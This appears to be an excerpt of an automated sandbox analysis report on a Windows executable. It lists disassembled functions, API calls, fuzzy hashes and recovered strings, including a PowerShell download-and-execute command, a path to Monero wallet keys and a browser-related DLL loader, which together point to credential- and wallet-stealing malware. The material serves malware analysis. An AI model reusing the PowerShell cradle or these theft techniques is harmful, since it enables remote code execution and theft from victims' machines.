                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: >=M$>=M
                              • API String ID: 1378416451-513215642
                              APIs
                              • memset.MSVCRT ref: 004D4325
                              • RegOpenKeyExA.ADVAPI32(80000001,012ADAA0,00000000,00020119,?), ref: 004D4344
                              • RegQueryValueExA.ADVAPI32(?,012AE4B8,00000000,00000000,00000000,000000FF), ref: 004D4368
                              • RegCloseKey.ADVAPI32(?), ref: 004D4372
                              • lstrcat.KERNEL32(?,00000000), ref: 004D4397
                              • lstrcat.KERNEL32(?,012AE4E8), ref: 004D43AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: d55e4ad7bf6b63b983512733c55782ec7e89d6bdd7173dda7239e087f7a9751d
                              • Instruction ID: 9f78e4cbfe86522d275e31b04444741ec1def36211c367c05f641b4165a4f288
                              • Opcode Fuzzy Hash: d55e4ad7bf6b63b983512733c55782ec7e89d6bdd7173dda7239e087f7a9751d
                              • Instruction Fuzzy Hash: 5E41C9B69101086BDF14EBA0EC56FEE733CBB88300F00C55FB71556191EA799A89CBE5
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                              • ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                              • LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                              • CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: ba03b0db0d86b2a3f400302200eb6c1a19698c6253c62408ecb41f9533df739e
                              • Instruction ID: 8a1c537e045d1e29174782b868bf3a5ce3fed75ad68dcb3ea9c3506892e10a84
                              • Opcode Fuzzy Hash: ba03b0db0d86b2a3f400302200eb6c1a19698c6253c62408ecb41f9533df739e
                              • Instruction Fuzzy Hash: DE31EB78A00209EFDB14CF94D845FEE77B5BB48304F10815AE911A7390DB78AA91CFA5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 42e9109ec3d3a4bf873d6fd58c29326e2c4de93eb05430739c22d6e570eeee23
                              • Instruction ID: 878da340c5654f77b962fe92daeccf8155ce4a4a75c416c670d098d3e7db6c43
                              • Opcode Fuzzy Hash: 42e9109ec3d3a4bf873d6fd58c29326e2c4de93eb05430739c22d6e570eeee23
                              • Instruction Fuzzy Hash: 0A4119B01007985EDB218B248DE4FFB7BE99B41704F1444EFDA8A96242D2359A45DF64
                              APIs
                              • lstrcat.KERNEL32(?,012AE518), ref: 004D4A2B
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 004D4A51
                              • lstrcat.KERNEL32(?,?), ref: 004D4A70
                              • lstrcat.KERNEL32(?,?), ref: 004D4A84
                              • lstrcat.KERNEL32(?,0129B8B0), ref: 004D4A97
                              • lstrcat.KERNEL32(?,?), ref: 004D4AAB
                              • lstrcat.KERNEL32(?,012ADD40), ref: 004D4ABF
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004D8F20: GetFileAttributesA.KERNEL32(00000000,?,004C1B94,?,?,004E577C,?,?,004E0E22), ref: 004D8F2F
                                • Part of subcall function 004D47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004D47D0
                                • Part of subcall function 004D47C0: RtlAllocateHeap.NTDLL(00000000), ref: 004D47D7
                                • Part of subcall function 004D47C0: wsprintfA.USER32 ref: 004D47F6
                                • Part of subcall function 004D47C0: FindFirstFileA.KERNEL32(?,?), ref: 004D480D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: a1c653f3fd720897aca46aa2c8874af3cadb77774959e94057e90828948abd26
                              • Instruction ID: c7b649368fd505c5fc9127e8293cf5c2b4b563e666930c7d8c3b2f65a6fbc93b
                              • Opcode Fuzzy Hash: a1c653f3fd720897aca46aa2c8874af3cadb77774959e94057e90828948abd26
                              • Instruction Fuzzy Hash: A1315FB691021867CB14EBB0DC95FED733CAB48704F40468FB24596251EE78A7C9CB9C
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D2FD5
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 004D2F14
                              • ')", xrefs: 004D2F03
                              • <, xrefs: 004D2F89
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004D2F54
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 51c02018c09f015e2cc78041d8bd008edfd16b5064584dbe11bf2e8a46fd4344
                              • Instruction ID: 40f437cd07a41129e58ccd967983e8664ec2a9d7380d5a827ce70d7d4932269b
                              • Opcode Fuzzy Hash: 51c02018c09f015e2cc78041d8bd008edfd16b5064584dbe11bf2e8a46fd4344
                              • Instruction Fuzzy Hash: 6B414C719102089ACB04EFA1C8B6BEDBB79AF10304F40405FE11267296DF782A5ACF99
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: dllmain_raw$dllmain_crt_dispatch
                              • String ID:
                              • API String ID: 3136044242-0
                              • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                              • Instruction ID: 2a83da155c8d5e4eae7d581d8d1a59c380cd064fcfa384f8a9382be25369c7f9
                              • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                              • Instruction Fuzzy Hash: AD218E72D4062DABDB229E65CC49ABF7F79FB81B90F055119F82977211C3308D419BA0
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 004D6C0C
                              • sscanf.NTDLL ref: 004D6C39
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004D6C52
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004D6C60
                              • ExitProcess.KERNEL32 ref: 004D6C7A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: d7b6863e085b0dc3b713d7d3d7d97654d4584f660ab1726b3a393348ffe51f30
                              • Instruction ID: 8c79b7720caead62cb82f394921994f8b4477dd22f5f2c3d3094de6c8ade3c78
                              • Opcode Fuzzy Hash: d7b6863e085b0dc3b713d7d3d7d97654d4584f660ab1726b3a393348ffe51f30
                              • Instruction Fuzzy Hash: 5B21CD75D142089BCF08EFE4E9559EEB7B9FF48300F04852FE506A3250EB349605CB69
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7FC7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7FCE
                              • RegOpenKeyExA.ADVAPI32(80000002,0129BEF8,00000000,00020119,?), ref: 004D7FEE
                              • RegQueryValueExA.ADVAPI32(?,012ADCA0,00000000,00000000,000000FF,000000FF), ref: 004D800F
                              • RegCloseKey.ADVAPI32(?), ref: 004D8022
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: f6c3a4846187581d7b2cfce1d750ba977efae557864e4988e425a83b1c71a20b
                              • Instruction ID: f2210c7801398ea07b66cfaed02d34bbec052875e1748d74121a9a143d3989f8
                              • Opcode Fuzzy Hash: f6c3a4846187581d7b2cfce1d750ba977efae557864e4988e425a83b1c71a20b
                              • Instruction Fuzzy Hash: 7B118CB1A94209ABD704CF84DD45FBBBBB8FB44B10F10821BF615A7280D7B95801CBA5
                              APIs
                              • StrStrA.SHLWAPI(012AE2F0,00000000,00000000,?,004C9F71,00000000,012AE2F0,00000000), ref: 004D93FC
                              • lstrcpyn.KERNEL32(00797580,012AE2F0,012AE2F0,?,004C9F71,00000000,012AE2F0), ref: 004D9420
                              • lstrlen.KERNEL32(00000000,?,004C9F71,00000000,012AE2F0), ref: 004D9437
                              • wsprintfA.USER32 ref: 004D9457
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 0d502a6bdda36ae6ac16f277c09dbaec704e9602327f49d97e64db59400ec462
                              • Instruction ID: d5f897dfed82ed22f9cebc687f911e9fce63a99848e7b749fe5c6183bc8edad5
                              • Opcode Fuzzy Hash: 0d502a6bdda36ae6ac16f277c09dbaec704e9602327f49d97e64db59400ec462
                              • Instruction Fuzzy Hash: 27011E75518108FFCB08DFA8D954EEE7B78EB48304F108249F9099B301D639AA51DB94
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004C12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004C12F5
                              • RegCloseKey.ADVAPI32(?), ref: 004C12FF
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: c143153104d0ddc06ff00ea7a098ec6228b2719c53277a605d981ddb7c2d6f0e
                              • Instruction ID: b911507fad652a58c295ebd77ffb1bf971035ed8544e39e2c240da7986d1f8dd
                              • Opcode Fuzzy Hash: c143153104d0ddc06ff00ea7a098ec6228b2719c53277a605d981ddb7c2d6f0e
                              • Instruction Fuzzy Hash: EA01E179A54209BFDB04DFD4DC49FAE7778FB48701F10819AFA0597290D7749A01CB94
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 004D6903
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D69C6
                              • ExitProcess.KERNEL32 ref: 004D69F5
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: ce677712a0678338b2cc3ac9a052d063d25e5b602c9aeca27ac484bcc90a55ce
                              • Instruction ID: 5803fc7295001bdfb6132c78ca9f6b28a75eab481050b06be97de35025f54d8d
                              • Opcode Fuzzy Hash: ce677712a0678338b2cc3ac9a052d063d25e5b602c9aeca27ac484bcc90a55ce
                              • Instruction Fuzzy Hash: 133118B1901218ABDB14EB91DCA6BDDB778AF44304F40418FF20566291DB786B49CF69
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,004E0E10,00000000,?), ref: 004D89BF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D89C6
                              • wsprintfA.USER32 ref: 004D89E0
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: e276ac079ffc307673fef1989f1950339a643c7beccf8c26eee5163a8992f612
                              • Instruction ID: 8557761c9acb04616322c9f74a62f43d65f9be3c40d2b40d49a5f08cd1d22f43
                              • Opcode Fuzzy Hash: e276ac079ffc307673fef1989f1950339a643c7beccf8c26eee5163a8992f612
                              • Instruction Fuzzy Hash: EE2160B1A54208AFDB04DFD4DD45FAEBBB8FB48700F10811AF615A7380C779A901CBA8
                              APIs
                              • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004CA098
                              Strings
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                              • API String ID: 1029625771-1545816527
                              • Opcode ID: ee6bfdd84edac404a16a081601a2f6305a2cac0352e169d867a2b1b7ee1ac530
                              • Instruction ID: fd85fde5ea2700a783ab6ed70c98c5e1661dc5feb298a5f09f44c319de36039a
                              • Opcode Fuzzy Hash: ee6bfdd84edac404a16a081601a2f6305a2cac0352e169d867a2b1b7ee1ac530
                              • Instruction Fuzzy Hash: 65F090746AC208AFD70CAB69EC4DF663394E305305F50841BE105932A0CB7C489ACB2E
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004D96AE,00000000), ref: 004D8EEB
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D8EF2
                              • wsprintfW.USER32 ref: 004D8F08
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 776a176d33f77d4dbea931e274ad8ae5da04822532149691574c2f63735a6dc7
                              • Instruction ID: 834604326183dff8e516506088bd5025531dc0b1d731a68697157128bdca375b
                              • Opcode Fuzzy Hash: 776a176d33f77d4dbea931e274ad8ae5da04822532149691574c2f63735a6dc7
                              • Instruction Fuzzy Hash: 94E08C74A68308BBDB04DB94DD0AE6D77B8FB04302F008096FD0987340DA759E00CB99
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
